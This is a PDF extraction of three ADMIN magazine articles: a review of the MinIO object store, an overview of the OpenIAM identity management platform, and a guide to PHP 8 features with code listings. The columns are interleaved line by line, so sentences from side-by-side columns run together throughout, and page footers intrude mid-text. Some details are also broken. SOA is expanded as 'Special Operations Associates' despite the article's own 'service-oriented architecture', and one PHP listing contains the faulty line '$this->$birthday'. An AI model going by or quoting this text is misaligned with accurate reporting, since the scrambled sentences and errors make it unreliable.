by way of the Ceph Object Gateway, written entirely in Go, which keeps for its data, and it is the admin’s job
which can handle both the OpenStack the number of dependencies to be re- to provide them. Like other solutions
Swift protocol and Amazon S3. solved to a minimum. (e.g., Ceph), MinIO takes care of its
MinIO is now following suit: It prom- MinIO Inc. itself also offers several redundancy setup itself (Figure 1).
ises a local S3 instance that is largely other options to help admins install The object store is based on the storage
compatible with the Amazon S3 im- MinIO on their systems [3]. The layer. MinIO views every file uploaded
plementation. MinIO even claims to ready-to-use Docker container, for to the store as a binary object. Incom-
offer functions that are not found in example, is particularly practical for ing binary objects, either from the client
Lead Image © zelfit, 123RF.com

the original. The provider, MinIO Inc. getting started in very little time. side or from other mini-instances of the
[1], is not sparing when it comes to However, if you want to do without same cluster, first end up in a cache. In
eloquent statements, such as “world- containers, you will also find an the cache, a decision is made as to what
leading,” or even “industry stan- installation script on the provider’s happens to the objects. MinIO passes
dard.” Moreover, it’s completely open website that downloads and launches them on to the storage layer in either
source, which is reason enough to the required programs. compressed or encrypted form.

16 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
MinIO TO O L S

Whereas object stores like Ceph do


not support complete mirroring for
various reasons, MinIO officially
supports this use case with the cor-
responding functions built-in; exter-
nal additional components are not
required.
With the MinIO client, which I dis-
cuss later in detail, admins instead
simply define the source and target
and issue the instructions for repli-
cation. The replication target does
not even have to be another mini-
instance. Basically, any storage de-
vice that can be connected to MinIO
Figure 1: The MinIO architecture is distributed and implicitly redundant. It also supports can be considered – including of-
encryption at rest. ©MinIO [4] ficial Amazon S3 or devices that
speak the S3 protocol, such as some
Implicit Redundancy data, almost 40TB of parity data is network-attached storage (NAS) ap-
required, whereas 300TB of disk pliances.
Redundancy at the object store level space would be needed for classic
is a good thing these days in a distrib- full replication. Encryption Included
uted solution like MinIO; hard drives On the other side of the coin, when
are by far the most fragile compo- resynchronization becomes necessary The role of encryption is becoming in-
nents in IT. SSDs are hardly better: (i.e., if single block storage devices creasingly important against the back-
Contrary to popular opinion, they or whole nodes fail), considerable ground of data protection and the
break down more often than hard computational effort is needed to increasing desire for data sovereignty.
drives, but at least they do it more restore the objects from the parity In the past, the ability to enable
predictably. data. Whereas objects are only copied transport encryption was considered
To manage dying block storage de- back and forth during resyncing in sufficient, but today, the demand for
vices, MinIO implements internal rep- the classic full replication, the indi- encryption of stored data (encryption
lication between instances of a MinIO vidual mini-nodes need a while to at rest) is becoming stronger. MinIO
installation. The object layers speak catch up with erasure coding. If you has heard admins calling for this
their own protocol via a RESTful API. use MinIO, make sure you use cor- function and provides a module for
Notably, MinIO uses erasure coding respondingly powerful CPUs for the dynamic encryption as part of the ob-
instead of the classic one-to-one rep- environment. ject layer. On state-of-the-art CPUs, it
lication used by Ceph. This coding uses hardware encryption modules to
has advantages and disadvantages: Eradicating Bit Rot avoid potential performance problems
The disk space required for replicas caused by computationally intensive
of an object in one-to-one replica- MinIO comes with a built-in data in- encryption.
tion are dictated by the object size. If tegrity checking mechanism. While
you operate a cluster with a total of the cluster is in use, the software Archive Storage
three replicas, each object exists three checks the integrity of all stored
times, and the net capacity of the objects transparently and in the Various regulations today require, for
system is reduced by two thirds. This background for both users and ad- example, government agencies to use
principle of operation has basically ministrators. If the software detects write once, read many (WORM) de-
remained the same since RAID1, even that an object stored somewhere – vices, which means that data records
with only one copy of the data. for whatever reason – is no longer can no longer be modified once they
Erasure coding works differently: It in its original state, it starts to re- have been sent to the archive. MinIO
distributes parity data of individual synchronize from another source can act as WORM storage. If so de-
block devices across all other block in the cluster where the object is sired, all functions that enable write
devices. The devices do not contain undamaged. operations can be deactivated in the
the complete binary objects, but the MinIO API.
objects can be calculated from the Cross-Site Replication However, don’t wax overly euphoric
parity data at any time, reducing the at this point – many authorities also
amount of storage space required in The software also uses its capabilities require that systems be certified and
the system. For every 100TB of user to replicate data to another location. approved for the task by law. The

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 17
TO O L S MinIO

MinIO website show no evidence that instances, you will need to operate a tionally, mc provides auto-completion
MinIO has any such certification. In second storage solution in addition to for various commands.
many countries, this solution would MinIO, such as a NAS or storage area What is really important from the
be ruled out for policy reasons in the network system. Although not very user’s point of view, however, is
worst case. helpful from an administrative point that this command can be used to
of view, the S3 feature implemented change the metadata of objects in
S3 Only in MinIO is significantly larger than the S3 store. If you want to replicate
that of the Ceph Object Gateway. Spe- a bucket from one S3 instance to an-
MinIO makes redundant storage with cialization is definitely a good thing other, you need the mirror command.
built-in encryption, anti-bit-rot func- in this respect. To use this, you first set up several
tions, and the ability to replicate to S3-based storage backends in mc, and
three locations easy to implement. S3 Jack of All Trades then stipulate that individual buckets
is the client protocol used – a major must be kept in sync between the
difference compared with other solu- At this point, the MinIO client needs two locations. Replication between
tions, especially industry leader Ceph. a good look. It can do far more than two MinIO instances is also quickly
Just as OpenStack Swift is designed a simple S3 client, because it is far set up with mc replicate. If you want
for Swift only, MinIO is designed to more than a simple client. If you a temporary share of a file in S3 to-
operate as an S3-compatible object specify an S3 rather than a MinIO gether with a temporary link, you
store only. instance as the target, its features can can achieve this with the mc share
MinIO therefore lacks the versatility also be leveraged by the MinIO client. command, which supports various
of Ceph: It cannot simply be used as The client can do far more by emulat- parameters.
a storage backend for virtual instance ing a kind of POSIX filesystem at the
hard drives. Also, the features that command line – but one that is re- Simple Management
Ceph implements as part of CephFS motely located in S3-compatible stor-
in terms of a POSIX-compatible file- age. The tool, mc, is already known in Another detail distinguishes MinIO
system are not part of the MinIO the open source world and offers vari- from other solutions like the Ceph
strategy, but if you’re looking for S3- ous additional commands, such as ls Object Gateway: The tool has a graph-
compatible storage only, MinIO is a and cp. By setting up cp as an alias ical user interface (GUI) as a client for
good choice. for mc cp or ls as alias for mc ls, you the stored files. The program, MinIO
If you additionally need backend don’t even need to type more than Browser (Figure 2) prompts for the
storage for virtual instances such the standard commands, which will usual S3 user credentials when called.
as virtual machines or Kubernetes then always act on the S3 store. Addi- The user’s buckets then appear in the

Figure 2: The MinIO Browser acts as a graphical interface for accessing content stored in MinIO. ©MinIO

18 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
MinIO TO O L S

overview. Various operations can be therefore look forward to a versatile button feature provides emergency
initiated in the GUI, but it is not as S3 store that communicates well with assistance by the provider’s con-
versatile as the command-line (CLI) other components. sultants, but only once a year. The
client. Most admins will probably subscription also includes an annual
give priority to the CLI version, espe- Commercial License review of the store architecture and
cially because it, unlike the GUI, is a performance review. This package
suitable for scripting. The described range of functions costs $10 per month per terabyte.
makes it clear that MinIO means However, charges are only levied up
Interfaces to Other hard work. Although MinIO Inc. re- to a total capacity of 10PB; every-
leased MinIO under the terms of the thing beyond this limit is virtually
Solutions AGPLv3, it also offers an alternative free of charge.
One central concern of the MinIO licensing option that differs in some If this license is not sufficient, you
developers is apparently to keep their key aspects from the terms of the AG- can use the Enterprise license, which
solution compatible with third-party PLv3; however, the vendor remains includes all the features of the Stan-
services, which, in practice, is very vague about the exact benefits of the dard license, but costs $20 per month
helpful because it means you do not commercial license. per terabyte up to a limit of 5PB. In
have to take care of central services Some companies, they say, did not return, customers receive five years
yourself (e.g., user management). want to deal with the detailed obliga- of long-term support, an SLA with a
Instead, you could combine a MinIO tions that AGPLv3 imposes on licens- response time of less than one hour,
installation with an external identity ees. As an example, the manufacturer unlimited panic button deployment,
provider such as WSO2 or Keycloak. cites companies on its compliance and additional security reviews. In
This principle runs throughout the website that want to distribute MinIO this model, the manufacturer also
software. MinIO itself comes with a as part of their own solution. One offers to reimburse customers for
key management service (KMS), for example of this would be providers some damage that could occur to the
instance, which takes care of manag- of storage appliances who use MinIO stored data.
ing cryptographic keys. This part of as part of their firmware. If such a The costing for both models refers to
the software is part of the encryption provider uses MinIO under the terms the actual amount of storage in use,
mechanism that secures stored data of the AGPLv3, they must pass on so if you have a 200PB cluster at your
and implements true encryption at the source code of the MinIO version data center, but you are only using
rest. However, if you are already us- used, including any modifications, 100TB, you only pay for 100TB. Ad-
ing an instance of HashiCorp Vault, to the customers and grant them the ditional expenditures for redundancy
you also can link MinIO to it through same rights as those granted to the are also not subject to charge. If you
the configuration, which avoids un- vendor itself by the AGPLv3. If the use the erasure coding feature for im-
controlled growth of solutions for vendor instead enters into a commer- plicit redundancy, you will only pay
specific applications. cial license agreement with MinIO, the amount for 100TB of user data,
Monitoring is another example: the obligation to hand over the source even though the data in the cluster
MinIO offers a native interface for code is waived. occupies around 140TB.
the Prometheus monitoring, alerting, This license is not exactly cheap. For
and trending solution; the developers SUBNET Makes It Possible 500TB of capacity used, the monthly
also provide corresponding queries bill would be $10,000, which is not
for Grafana. MinIO can be combined The far more common use case for a small amount for software-defined
with various orchestrators, different the commercial license is probably storage.
load balancers (e.g., Nginx and HAP- customers who need commercial sup-
roxy), or frameworks such as Istio. port directly from the manufacturer. The Elephant in the Room
MinIO makes sure these connections The subscription program, known as
also work in the opposite direction. SUBNET, distinguishes between two MinIO impresses with its feature set
Anyone who uses typical applica- levels. As part of a standard subscrip- and proves to be robust and reliable
tions from the Big Data environment tion, customers automatically receive in tests. Because the program uses the
(e.g., Kafka, Hadoop, TensorFlow) long-term support for a version of Amazon S3 protocol, it is usable for
can query data directly from MinIO MinIO for a period of one year. A many clients on the market, as well
and store data there. Moreover, MinIO service-level agreement (SLA) guaran- as by a variety of tools with S3 inte-
provides a powerful backend storage tees priority assistance for problems gration. Therefore, a critical, although
solution for most manufacturers of in less than 24 hours. To this end, brief look at the S3 protocol itself
backend systems. Because the devel- customers have round-the-clock ac- makes sense.
opers have supported the S3 protocol cess to the manufacturer’s support. All of the many different S3 clones
for years, MinIO is sufficiently com- For updates, MinIO Inc. is avail- on the market, such as the previ-
patible. If you use MinIO, you can able with help and advice. A panic ously mentioned Ceph Object Gate-

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 19
TO O L S MinIO

way, with an S3 interface have one S3 implementations on the market Conclusions


central feature in common: They are damaging the core brand, which
use a protocol that was not intended in turn could have negative conse- MinIO is a powerful solution for a lo-
by Amazon for use post-implemen- quences for companies that use S3 cal object store with an S3-compatible
tation. Amazon S3 is not an open clones locally. interface. In terms of features, the so-
protocol and is not available under If Amazon were to prohibit MinIO, lution is cutting edge: Constant con-
an open source license. The compo- for example, from selling the software sistency checks in the background,
nents underlying Amazon’s S3 ser- and providing services for it by court encryption of stored data at rest, and
vice are not available in open source order, users of the software would erasure coding for more efficient use
form either. be out in the rain overnight. MinIO of disk space are functions you would
All S3 implementations on the mar- would then continue to run, but it expect from a state-of-the-art storage
ket today are the result of reverse would hardly make sense to operate solution. Because the product is avail-
engineering. The starting point is it and would therefore pose an imma- able free of charge under an open
usually Amazon’s S3 SDK, which de- nent operating risk. source license, it can also be tested
velopers can use to draw conclusions and used as part of proof-of-concept
about which functions a store must Unclear Situation installations. If you want commercial
be able to handle when calling cer- support, you can get the appropriate
tain commands and what feedback it How great the actual danger is that license – but do expect to pay quite a
can provide. Even Oracle now oper- this scenario will occur cannot be serious amount of money for it. n
ates an S3 clone in its own in-house realistically quantified at the moment.
cloud, the legal status of which is For admins, then, genuine security Info
still unclear. that a functioning protocol is avail- [1] MinIO Inc.: [https://minio.io]
For the users of programs like able in the long term can only be [2] GitHub: [https://github.com/minio/minio]
MinIO and for their manufacturers, achieved with the use of open source [3] Downloads:
this uncertain status results in at approaches. [https://min.io/download#/linux]
least a theoretical risk. Up to now A prime example would be Open- [4] MinIO architecture:
Amazon has watched the goings-on Stack Swift, which in addition to [https://docs.minio.io/docs/
and has not taken action against S3 the component, is also the name distributed-minio-quickstart-guide.html]
clones. Quite possibly the company of the protocol itself. However, the
will stick to this strategy. However, number of solutions on the market The Author
it cannot be completely ruled out that implement OpenStack Swift is Martin Gerhard Loschwitz is
that Amazon will tighten the S3 tiny: Besides the original, only the Cloud Platform Architect at
reins somewhat in the future. The Ceph Object Gateway with Swift Drei Austria and works on
group could justify such an action, support is available. Real choice topics such as OpenStack,
for example, by saying that inferior looks different. Kubernetes, and Ceph.

20 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
TO O L S OpenIAM

Identity and access management with OpenIAM

Authorization
Center
Identity and access management plays a central role in modern IT infrastructures, with its local resources,
numerous applications, and cloud services. We investigate how OpenIAM implements centralized user
management. By Thorsten Scherf

Managing user identities decen- become interesting for increasing communicate with the help of the
trally and manually directly within numbers of businesses in the light of ESB. Figure 1 shows the schematic
applications is not only error-prone, data protection regulations (e.g., the structure of the individual layers and
it also takes up valuable time and European Union’s General Data Pro- their components.
involves administrative overhead. tection Regulation, GDPR). Users usually access OpenIAM from
Storing users and their access au- Although the vast majority of IAM a graphical interface. The user in-
thorizations for certain systems and products support these requirements, terface allows access to both the
applications in a central location they present no uniform implemen- self-service portal and administrative
makes sense, especially in hybrid tation approach in practical terms. tools. For access to enterprise ap-
environments, where applications OpenIAM [1] is a fully integrated plat- plications, OpenIAM also acts as an
exist both on-premises and in vari- form that manages user identities and identity provider (IdP). As usual, the
ous clouds. access rights, supporting all require- interface can be adapted to reflect a
Identity and access management ments companies need in a modern corporate identity.
(IAM) tools typically provide a num- IAM tool. A Tomcat server provides the individ-
ber of functions to facilitate this ual services in the service layer. The
work. Not only does the software Microservice-Based infrastructure components comprise
provide user lifecycle and access RabbitMQ for the message bus, Redis
management, it needs to offer other
Architecture as an in-memory cache, and Elastic-
features, such as a self-service portal OpenIAM essentially comprises two search for all search queries.
for resetting user passwords or for components: Identity Governance and Any relational database can run on
Lead Image © Chatree Jaiyangyuen, 123rf.com

additional authorization requests. the Access Manager. To fulfill its task, the backend. OpenIAM offers schema
A single sign-on based on modern the software relies completely on a files for MySQL, MariaDB, Microsoft
protocols such as OpenID Connect or service-oriented architecture (SOA) SQL Server, PostgreSQL, and Oracle
Security Assertion Markup Language and uses an enterprise service bus databases. Notably, the software pro-
2.0 (SAML2) should also be part of (ESB) for communication between vides a REST API in addition to the
the standard scope. Flexible auditing the individual services. To map these graphical user interface, which allows
is necessary to implement compliance two core components of the software, developers to extend the software ac-
requirements for a centralized system the tool provides more than 20 differ- cording to their own requirements or
of this type, and SAML2 will certainly ent services in the service layer that to link it with external tools.

22 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
OpenIAM TO O L S

User Provisioning with provisioning API to initiate a quasi nectors that enable access to LDAP,
real-time sync. The software evalu- Microsoft Office 365, Active Directory,
Connectors
ates the data from the identity re- Exchange, Google Suite, SAP enter-
In a typical IAM use case, as soon pository and decides, on the basis of prise resource planning software,
as a new employee joins a company, pre-defined rules, to which systems Oracle RDBMS and eBusiness Suite
they are given access to all the sys- a user should have access and which (EBS), Workday, ServiceNow, and
tems they need for their daily work. rights they should be given on those Linux systems. You will find a com-
Likewise, when an employee leaves systems. Rules can be created ac- plete list online [2]. If required, you
the company, access to these systems cording to any attributes of a user can, of course, adapt these connectors
must be revoked. object. For example, users with the or add new ones.
OpenIAM solves this task by provi- devel role could be given access to In OpenIAM, rules define which
sioning or deprovisioning user ac- all development systems within the accounts should be provisioned to
counts on the respective systems. The company or a department, whereas which target systems. The system
software assumes a single authorita- access to HR systems would be de- appropriately calls these target sys-
tive source in the company that holds nied to these users. tems “managed systems.” Again, if
all employee data – usually a human a change is made to an account in
resources (HR) system, but in the Rules Assign Attributes the OpenIAM repository, it is also re-
simplest case it can also be a CSV file, flected in the managed systems.
which is very well suited in testing With the help of rules, you also can At this point, note that OpenIAM
scenarios for becoming familiar with map attributes between OpenIAM naturally lets you configure pass-
the system. and a target system. For example, if word policies. If a user’s password
With the help of connectors, Ope- a user from the HR system has been changes within the application – ei-
nIAM accesses and imports the data synchronized and has an employee_ID ther through the self-service portal or
into the OpenIAM identity repository. attribute, you will probably want by the actions of an administrator – it
This process takes place during the to assign this attribute to the Light- must meet the complexity require-
initial setup of the software until a weight Directory Access Protocol ments defined in the policy.
consistent state exists between the (LDAP) employeeNumber attribute when
source system from which the data synchronizing with Active Directory Self-Service Portal
comes and the OpenIAM repository. or some other directory. Within the
During operation, constant synchro- software, you create a suitable rule Users already provisioned can re-
nization between these systems takes for this purpose, which is then stored quest access to additional systems or
place. If, for example, the department as a Groovy script in OpenIAM. You extensions of their rights on existing
in which an employee works changes can modify the script at any time with systems in the user interface. For
on the HR system, it is also reflected the GUI editor. this purpose, OpenIAM provides a
in OpenIAM. The systems can be When data evaluation is complete, service catalog from which users can
synchronized either by regular poll- the accounts are provisioned to the select the desired systems and au-
ing of the source system or triggered target systems. For this purpose, the thorizations.
by events. connectors I mentioned before are One interesting feature is the ability
In event-based synchronization, the again used. To this end, OpenIAM of- to limit the access rights requested in
source system relies on OpenIAM’s fers a whole range of predefined con- this way, which is particularly useful
if an employee only needs tempo-
rary access to certain services for a
project. The procedure also includes
an approval process. If the OK for
the request comes from one or more
approvers, the software in turn auto-
matically ensures that the user is pro-
visioned to the system and receives
the necessary rights. Figure 2 shows
the complete provisioning process.

Web Access Manager


In addition to Identity Governance,
Web Access Manager is the second in-
tegral component within the OpenIAM
Figure 1: OpenIAM provides its services in different layers. framework. As the name suggests, this

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 23
TO O L S OpenIAM

component authorizes users after they For example, the user authenticates ties: the Community and Enterprise
have gained access to a system. As well against OpenIAM with OAuth 2.0 and, versions. The Community version is
as access controls, it provides other if successful, is issued a JSON web available for free download on the
services and features, such as single token (JWT) that then serves as an ID OpenIAM website [4]. The Enter-
sign-on, multifactor authentication, and token to log on to the service provider. prise Edition offers two subscrip-
session management and integrates Users can also call an application from tion models that provide access to
these into Access Management. a remote security domain directly from additional resources and support
One central component of Web Access the OpenIAM interface (Figure 3). beyond the software itself. The cur-
Manager is single sign-on with feder- The authentication process is com- rent 4.2.0.1 version (at press time)
ated user identities. In this case, Ope- pletely transparent to users, who can supports Red Hat Enterprise Linux 8
nIAM serves as an identity provider also use the ID token to log on to other and CentOS 8, but earlier versions of
and ensures that access to service systems. Another interesting feature the RPM package before 4.1.6 only
providers, such as Salesforce or Oracle, is that OpenIAM provides a reverse run on Red Hat Enterprise Linux 7 or
takes place transparently for the user proxy for applications that do not sup- CentOS 7.
through the use of state-of-the-art pro- port the federation protocols used, It is somewhat unusual that the
tocols like OpenID Connect or SAML2. which means that legacy applications RPM only packages the OpenIAM
For this purpose, a position of trust be- can also benefit from single sign-on. sources as a tarball, which it then
tween different security domains must simply unpacks under /usr/local/
be established in the configuration. Testing OpenIAM OpenIAM/ when installing the pack-
In practical terms, a redirect to the age. But at least the package makes
OpenIAM framework occurs when If you are interested in trying out sure that these files disappear when
one of these applications is accessed. OpenIAM, you have two possibili- you uninstall the software. As an

Figure 2: OpenIAM provides accounts on the desired target systems. © OpenIAM [3]

24 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
OpenIAM TO O L S

alternative to installing the RPM ware for the management of user with single sign-on support, OpenIAM
file, you can also obtain a container identities and access rights. The tool also acts as an identity provider and
image of the software and then run supports all requirements that com- combines this with sophisticated ac-
it with a container runtime. Only panies have for a modern IAM tool. cess management. The feature scope
Docker is officially supported, but Thanks to SOA (Special Operations naturally requires a certain amount of
the container image should work Associates) security and the numer- training; however, the effort will cer-
with the Podman runtime without ous APIs that the software provides, tainly pay off in later operation. After
any problems; I did not try this out it is easy to adapt or extend it to all, OpenIAM helps you automate
when writing this article. your own needs. almost all operations for identity and
The integrated Groovy scripting access management. n

Conclusions language lets you create scripts that


synchronize users from a source sys-
OpenIAM is an extremely complex tem to any target system with flexible Info
and comprehensive piece of soft- mapping of user attributes. Together [1] OpenIAM: [https://www.openiam.com]
[2] OpenIAM connectors: [https://
www.openiam.com/products/
identity‑governance/connectors/]
[3] Provisioning: [https://www.openiam.com/
products/identity‑governance/features/
provisioning/provisioning‑2/]
[4] OpenIAM download: [https://www.openiam.
com/registration/]

The Author
Thorsten Scherf is a
Senior Principal. Product
Experience Engineer who
works in the global Red
Hat Identity Management
Figure 3: With OpenID Connect or SAML2, users can access applications in remote security team. You can meet him as
domains with single sign-on. a speaker at various conferences.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 25
TO O L S PHP 8

New features in PHP 8

Conversion Work
After about two years of development, version 8 of the popular PHP scripting language was released on
November 26, 2020. It comes with a number of innovations and ditches some obsolete features. By Tim Schürmann

One of the major innovations in PHP code to be executed has been stored saves developers some typing. For
is intended to give the scripting lan- in a cache provided by the OPcache example, the scripting language
guage a boost, but it does require some extension [1]. Thanks to this cache, adds a more powerful and more
prior knowledge. As of version 5.5, the the interpreter does not have to re- compact match function to supple-
read the scripts for every request. ment switch. In Listing 1, $flasher
Listing 1: match PHP 8 sees OPcache expanded to is only On if $lever is set to Up or
$flasher = match ($lever) { include a just-in-time (JIT) compiler. Down. If none of the comparison
0 => "Warning_Flasher", This converts parts of the PHP code values before => are correct, the de‑
'Up', 'Down' => "On", into native program code, which the fault value applies.
default => "Off"
processor then executes directly and The call to $user‑>address‑>getBirth
};
far faster as a consequence. As a day()‑>asString() in Listing 2 only
further speed tweak, the generated works if $address exists and get‑
Listing 2: Happy Birthday? binary code is also cached. When the Birthday() returns a valid object. To
01 // ‑‑‑‑ previously ‑‑‑‑‑‑‑‑
PHP code is restarted, PHP 8 simply do this, developers previously had
02 if ($user !== null) { accesses the precompiled binary code to nest several if branches. The new
03 $a = $user‑>address; from the cache. nullsafe operator ?‑> checks the exis-
04 As the first benchmarks by PHP de- tence automatically and reduces the
05 if ($a !== null) { veloper Brent Roose show [2], scripts test to one line (line 15).
06 $b = $user‑>getBirthday(); with repetitive or extensive calcula- Where a class needs to encapsulate
07 tions obviously benefit from these an address or other data, the devel-
Lead Image © Maxim Borovkov, 123RF.com

08 if ($b !== null) { changes. When handling individual oper usually first notes the appropri-
09 $bday = $b‑>asString();
short requests, the JIT compiler shows ate variables, which are then assigned
10 }
its advantages to a far lesser extent. values by a constructor (Listing 3,
11 }
lines 2-12). In PHP 8, this can be
12 }
13 Abbreviation written in a concise way (Listing 3,
14 // ‑‑‑‑ in PHP 8 ‑‑‑‑‑‑‑‑ lines 15-21).
15 $bdate = $user?‑>address?‑>getBirthday()?‑>asString(); The syntax, which has changed The constructor now collects all the
slightly in some places in PHP 8, required information from which

26 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
PHP 8 TO O L S

PHP 8 automatically derives the Optional parameters can also be word World is determined by the
complete class structure. Thanks to omitted, like $depth in the example strpos() function. In PHP 8, there is
the Constructor Property Promotion shown in Listing 6. By the way, an alternative to this: str_contains()
syntax, programmers can create data Listing 6 shows a further innova-
objects far faster and also refactor tion: After the last parameter, you Listing 3: Encapsulating Data
them more quickly later. can use another comma, even if no 01 // ‑‑‑‑ previously ‑‑‑‑‑‑‑‑
further parameters follow. 02 class Address
Exceptional Phenomenon 03 {
04 public string $name;
Flextime 05 public DateTimeImmutable $birthday;
Until now, PHP developers always
had to catch exceptions in a vari- When you compute with integers, 06
07 public function __construct(string $n,
able, even if they didn’t want to do floating-point numbers are often gen-
DateTimeImmutable $g)
anything else with the corresponding erated. Wouldn’t it be useful if the
08 {
object. From PHP 8 on, in such situ- corresponding function could return
09 $this‑>name = $n;
ations, you simply omit the variable an int or a float value as needed. In 10 $this‑>$birthday = $g;
and just specify the type. If you want PHP 8, this is achieved with union 11 }
to handle all errors in the catch block, types. You simply combine several 12 }
simply catch Throwable (Listing 4). possible data types with a pipe char- 13
The get_class() function returns an acter (|). In the example shown in 14 // ‑‑‑‑ in PHP 8 ‑‑‑‑‑‑‑‑
object’s class name. Developers using Listing 7, area() returns either an int 15 class Address
PHP 8 or higher can access this class or a float value. 16 {
with an appended ::class, as shown Another new data type is mixed. It 17 public function __construct(
in Listing 5. stands for one of the data types ar‑ 18 public string $name,
19 public DateTimeImmutable $birthday,
ray, bool, callable, int, float, null,
20 ) {}
Typical! object, resource, or string. The mixed
21 }
data type always occurs if the type
Functions expect their parameters in information is missing. For example,
a given order. Especially with a large you can use mixed to indicate that you Listing 4: Throwable
number of parameters, it is easy to cannot or do not want to specify the try {
lose track. The following code, which type of a variable at the correspond- [...]
calculates the volume of a box, for ex- ing position. } catch (Throwable) {
ample, does not make it entirely clear The new WeakMap data structure works Log::error("Error!");
}
which value stands for the width: much like an array but uses objects
as keys (Listing 8). Garbage Collec-
$v = volume(10, 3, 2); tion can also collect the used objects, Listing 5: Class Name
so if the program destroys $a at some $a = new Address();
In PHP 8, developers can explicitly point further downstream (e.g., inten- var_dump($a::class);
note the names of the corresponding tionally with unset($a);), PHP would
parameters to ensure clarity. When automatically remove the correspond- Listing 6: Named Parameters
using these named arguments, you ing $cache[$a] entry.
function volume(int $width, int $height, int $depth = 1)
also choose the order of the pa- In Figure 1, var_dump() outputs Weak‑ { return $width * $height * $depth; }
rameters according to your needs. Map once; an address object acts as $v = volume(height: 3, width: 10,);
the key here. Then unset()
destroys this object, which
automatically removes the Listing 7: Data Types with Pipe
entry from WeakMap. This is class Rect {
proven by the second out- public int|float $x, $y, $w, $h;
put of var_dump() (shown
in the last two lines of public function area(): int|float {
Figure 1). One of WeakMap‘s return $this‑>w * $this‑>h;
}
main areas of application
}
is customized caching.

Listing 8: WeakMap
More Functional $cache = new WeakMap;
Figure 1: The entry in WeakMap disappears along with Whether or not the Hello $a = new Address;
the object. World string contains the $cache[$a] = 123;

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 27
TO O L S PHP 8

(Listing 9). The siblings str_starts_ resources, and it reveals the classes Attributes can be read using the Re-
with() and str_ends_with(), which of objects. As the function name sug- flection API. The example shown in
search for the word at the beginning gests, it is mainly intended to make Listing 11 uses the new getAttrib‑
and at the end of the string, respec- writing debug messages easier. Each utes() method to get all the attributes
tively, are new. The fdiv() function resource, such as an open database for the User class in the form of an
divides a floating-point number by connection, is assigned an internal array with all attributes. Each one
zero without grumbling and returns identification number. Develop- encapsulates an object of the type
INF, ‑INF, or NAN. ers now can also address them in ReflectionAttributes. Among other
The get_debug_type() function de- a type-agnostic way using get_re‑ things, this new class has a getName()
termines the data type of a variable. source_id(). method that reveals the name of the
In contrast to the already existing The well-known token_get_all() attribute.
gettype(), the new function also function returns the matching PHP The getName() method is used in
identifies strings, arrays, and closed tokens for PHP source code [3]. You line 3 of Listing 11, which simply
can have either a string or an array, outputs the name of the attribute
Listing 9: str_contains() which is anything but handy. This via var_dump() – in the DatabaseTable
if (str_contains('Hello World', 'World')) { [...] } has led to PHP 8 introducing the example. Similarly, getArguments() in
PhpToken class. Its getAll() method line 4 returns the corresponding pa-
returns an array of PhpToken objects, rameters as an array (Figure 2).
Listing 10: Attributes which in turn encapsulate the indi-
#[DatabaseTable("User")] vidual tokens. This token_get_all() Small Matters
class User replacement is easier to use, but at
{ the price of using more memory. Sorting functions in PHP have not
#[DatabaseColumn] been stable thus far, leaving the
Attributes order of identical elements in the
public $name;
sorted results to chance. In PHP 8,
Many other languages offer anno- all sorting routines adopt identical
public function setBirthday(#[ExampleAttribute] $bday) { }
tations to let programmers attach elements in the order that existed in
}
metadata to classes. In this way, the the original array.
developers can make a note of, say, The PHP developers have also in-
Listing 11: Reading Attributes the database table in which the class troduced a new Stringable interface
stores its data. PHP 8 now has an op- that automatically implements a
01 $reflectionClass = new \ReflectionClass(User::class);
02 $attributes = $reflectionClass‑>getAttributes(); tion for this in the form of attributes. class if it offers the __toString()
03 var_dump($attributes[0]‑>getName()); The actual information is located be- function. The string|Stringable
04 var_dump($attributes[0]‑>getArguments()); tween #[ ... ] directly in front of the union type then accepts both strings
class, as shown in Listing 10. and objects with the __toString()
As the example demonstrates, attri- method. This in turn is intended to
Listing 12: static butes can be attached to classes, but improve type safety.
class Foo { also to variables, constants, meth- Since the JSON data format is now
public function create(): static { ods, functions, and parameters. The the format of choice in many web
return new static(); information’s structure and content applications, PHP 8 can no lon-
}
is determined by the developer or a ger be compiled without the JSON
}
framework that evaluates the attri- extension. Developers can more
butes. In Listing 10, the class is as- easily convert DateTime and Date
Listing 13: Traits signed an attribute of DatabaseTable. TimeImmutable into each other using
trait Coordinates { If necessary, you can pass in param- DateTime::createFromInterface() and
abstract public function area(): int; eters in the brackets. The example DateTimeImmutable::createFromInter
} reveals that the database
table is named User.
class Rectangle { The PHP developers have
use Coordinates; been working on the syntax
public function area(): int { [...] } for attributes for quite some
}
time. There was some talk
of using <<ExampleAttrib‑
class Circle {
use Coordinates;
ute>> and @@ExampleAttrib‑ Figure 2: For the #[DatabaseTable("User")]
public function area(): string { [...] } utes as tags, and you will attribute, the Reflection API correctly returns
} find references to this in DatabaseTable as the name and User as the
numerous posts on PHP 8. parameter. All parameters are bundled into an array.

28 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
PHP 8 TO O L S

Namespaces Conclusions
may no longer
contain spaces PHP 8 includes many useful new fea-
in their names, tures that make the developer’s life
but from now easier and provide for more compact
Figure 3: Here, PHP 8 has detected that the Circle class on reserved code. In particular, the new match,
implements the area() function incorrectly. keywords are Constructor Property Promotion,
also allowed as and attributes should quickly find
face(). static can also be used as the parts of a namespace identifier. many friends. In addition, PHP 8
return type (Listing 12). Within the Reflection API, the signa- cautiously throws out some outdated
tures of some methods have changed. behaviors and constructs. Existing
Traits For example, instead of Reflection PHP applications, however, will most
Class::newInstance($args);, PHP 8 uses likely need to be adapted as a result.
